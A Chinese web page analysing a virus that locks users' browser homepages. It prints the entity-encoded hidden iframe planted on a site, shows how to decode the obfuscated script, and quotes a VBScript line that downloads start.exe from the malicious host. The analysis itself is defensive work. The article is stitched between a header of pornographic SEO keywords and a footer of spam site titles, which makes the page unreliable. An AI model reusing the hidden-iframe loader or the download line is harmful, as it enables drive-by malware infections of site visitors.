亚洲天堂一级片-亚洲天堂三区-亚洲天堂久久精品成人-亚洲天堂毛片-久久国产欧美日韩高清专区-久久国产欧美日韩精品免费

面對網(wǎng)站惡意病毒我們該怎么辦?

  前不久,很多網(wǎng)友都感染了網(wǎng)站的病毒,首頁被改成這個網(wǎng)站,并且無法改回。黑客是如何做到鎖定用戶的瀏覽器首頁呢?下面我們就去探個究竟。

  提醒:分析病毒存在一定風險,建議在虛擬機下操作。

  第一步 查看病毒網(wǎng)站首頁的源代碼,可以發(fā)現(xiàn)在尾部有如下的字樣:

  <iframe src=&#104&#116&#116&#112&#58&#47&#47&#109&#46&#100&#97&#115&#104&#111&#119&#46&#99&#111&#109&#46&#99&#110&#47&#109&#46&#104&#116&#109&#108 width=0 height=0></iframe>

  這是一個嵌入到7b網(wǎng)址之家首頁的頁面,即打開網(wǎng)站也就同時打開了這個頁面。

  而“&#104&#116&#116&#112&#58&#47&#47&#109&#46&#100&#97&#115&#104&#111&#119&#46&#99&#111&#109&#46&#99&#110&#47&#109&#46&#104&#116&#109&#108”表示的是一個字符串,“&#”后面是每個字符串ASCII的十進制值。

  直接把這段亂碼保存為HTM文件,用IE打開,就可以看到它的真實面目“http : // m.dashow.com.cn / m.html”。

  第二步 查看http : // m.dashow.com.cn / m.html的源代碼,把看的<scrtipt>腳本段中的Execute替換為Document.Write,然后打開這個HTM頁面,就會出現(xiàn)一段代碼,同樣地,把EXECUTE換成我們無敵的Document.Write,前后加腳本標記,存HTM打開。屏幕上立即出現(xiàn)了一段令人眼花的東西。把眼花繚亂的東西整理一下,并將出現(xiàn)的CHR()在前面用到過,作用是把字符的ASCII轉(zhuǎn)成字符,只不過這次是16進制。然后再將字符拼接成字符串,然后再Execute運行這個命令字符串。繼續(xù)用Document.Write替換掉EXECUTE,前后加腳本標記,存HTM打開。

  第三步 經(jīng)過上幾步的還原后終于看到了這個惡意頁面的最終面目。

  on error resume next curl = "http : // m.dashow.com.cn / start.exe"……其后省略。

  這段代碼中我們可以很清楚地看到http : // m.dashow.com.cn / start.exe這個鏈接。沒錯,它就是運行后可以將用戶主頁鎖定為網(wǎng)站的病毒。

  可以用下載工具將這個文件下載下來,如果你的殺毒軟件查不到的話最好立即上報。這樣可以保證殺毒軟件快速查殺這個病毒,并使更少的網(wǎng)友免受該病毒的侵害。

北大青鳥網(wǎng)上報名
北大青鳥招生簡章
主站蜘蛛池模板: 思99re久久这里只有精品首页 | 亚洲男人的天堂在线 | 国产欧美一区二区三区久久 | 久草草视频在线观看免费高清 | 亚洲国产成人精品一区二区三区 | 国产一区在线免费观看 | 欧美日韩a∨毛片一区 | 国产成年人 | 午夜成年女人毛片免费观看 | 久草视频在线资源站 | 国产自产v一区二区三区c | 91国内在线| 久久女同互慰一区二区三区 | 特级毛片8级毛片免费观看 特级毛片免费观看视频 | 国内精品久久久久影院亚洲 | 精品视频自拍 | 亚洲午夜影视 | 久久精品一区二区三区日韩 | 欧美精品hdvdeosex4k | 国产在线精品香蕉综合网一区 | 在线看片日韩 | 日韩三级在线观看 | 精品99在线观看 | 成人欧美精品一区二区不卡 | 久色一区 | 国产一级视频在线 | 伊人黄网 | 久久观看 | 在线成人a毛片免费播放 | 久久国产免费观看精品3 | 日本精品99 | 国内自产拍自a免费毛片 | 女让张开腿让男人桶视频 | 国产盗摄一区二区三区 | 日韩一区二区视频在线观看 | 400部大量精品情侣网站 | 美女视频永久黄网站免费观看国产 | 精品久久久日韩精品成人 | 亚洲精品一区二区久久 | 亚洲精品区一区二区三区四 | 亚洲国产精品aaa一区 |